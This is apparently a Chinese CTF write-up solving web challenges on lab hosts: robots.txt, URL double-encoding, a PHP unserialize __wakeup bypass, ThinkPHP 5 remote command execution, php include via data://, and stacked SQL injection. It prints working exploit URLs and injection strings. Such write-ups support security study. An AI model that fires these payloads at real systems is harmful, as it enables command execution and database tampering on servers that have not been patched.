1.Training-WWW-Robots
打开应用场景,如下:
网址后面添加/robots.txt 查看其中内容(robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件),内容如下:
根据提示,访问/fl0g.php,得到flag值。
cyberpeace{b723b5eabd63b450baeff4d85829c3d6}
2.PHP2
题目描述为
搜索栏http://111.200.241.244:49822/index.phps得到页面的源代码。
not allowed!"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "admin") { echo "Access granted!"; echo "Key: xxxxxxx"; } ?> Can you anthenticate to this website? 由PHP源代码可以知道,主要解析Access granted!之前的内容,
$_GET[id] = urldecode($_GET[id]); 会对传入的id参数内容,进行一次urlcode().
if($_GET[id] == "admin") 判断获取的id是否为admin,如果是,则可以获取flag。
在这里,我们需要知道的是,需要从payload读取id = admin,会对s进行两次url解码。第一次admin进行url编码后为%61%64%6d%69%6e。第二次admin = %2561dmin。得到flag为 cyberpeace{f8570244030b4be15bd0639161608641}。url编码表如下:
3.unserialize3
4.XTCTF(代码审计)
class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php $this->file = 'index.php'; } } }if (isset($_GET['var'])) { $var = base64_decode($_GET['var']); if (preg_match('/[oc]:\d+:/i', $var)) { die('stop hacking!'); } else { @unserialize($var); } } else { highlight_file("index.php"); } ?>推测为PHP反序列化方向的问题
class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php $this->file = 'index.php'; } } } $s=new Demo('fl4g.php'); $s=serialize($s); echo $s; $s = str_replace('O:4', 'O:+4',$s); // 绕过正则 $s = str_replace(':1:', ':2:' ,$s);// 绕过wakeup echo base64_encode($s);?>得出test.php的运行结果:O:4:“Demo”:1:{s:10:“Demofile”;s:8:“fl4g.php”;}TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
payload =http://111.200.241.244:61945/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== 得出flag
5.php_rce
ThinkPHP 5漏洞
漏洞原理:程序未对控制器进行过滤,导致攻击者可以用斜杠(\)调用任意方法。
利用system函数远程命令执行:/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
其中,vars[1][]=(Linux指令)
在url后面添加/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
根据Linux命令,ls命令用于显示文件目录列表
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /
可以看到文件目录中有flag,因此进入flag的目录下。111.200.241.244:50037/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /flag
再利用linux中的cat命令查看整个文件。http://111.200.241.244:50037/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
6.Web_php_include
show_source(__FILE__);echo $_GET['hello'];$page=$_GET['page'];while (strstr($page, "php://")) #{ $page=str_replace("php://", "", $page);}include($page);#//文件包含,可以执行page变量中的代码。?>include($page)表示题目主要考察文件包含漏洞。
该题目主要考察PHP伪协议,在该博客中有对PHP伪协议详细的介绍,https://www.cnblogs.com/weak-chicken/p/12275806.html。
在上述代码可以看到while中设置strstr()函数,该函数对大小写不敏感,所以要想使用php协议,要改成大写。
在url后面添加?page=data://text/plain,
后面的PHP代码将会被实现,"ls"和"dir"均可用于查看当前目录文件。
可以看到,flag值在fl4gisisish3r3.php中。
采用cat命令查看可能存在flag值的文件。
PHP源代码不显示内容,采用页面源代码。
7.supersqli
判断网站是否存在注入情况:https://www.cnblogs.com/SCHAOGES/p/10889654.html
可能存在字符注入。
1';show databases;#展示所有的数据库。
1';use supersqli; #使用该数据库1';show tables; #展示该数据库下所有的表
可以看出得到两个表,1919810931114514和words。
因为我们无法确认哪个表中有flag,因此我们需要查看两个表中的列名。
1'; show columns from `words`; #查看word表的值,注意这里的反引号。
没有flag有关的列值因此,查看另一个表。
1'; show columns from `1919810931114514`;
此时,我们需要思考如何回显flag的值。
在之前的测试中,发现网页会自动过滤select、insert等字段
1';alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);1' or '1'='1
7.ics-06
云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹
来源地址:https://blog.csdn.net/m0_56010012/article/details/122656326
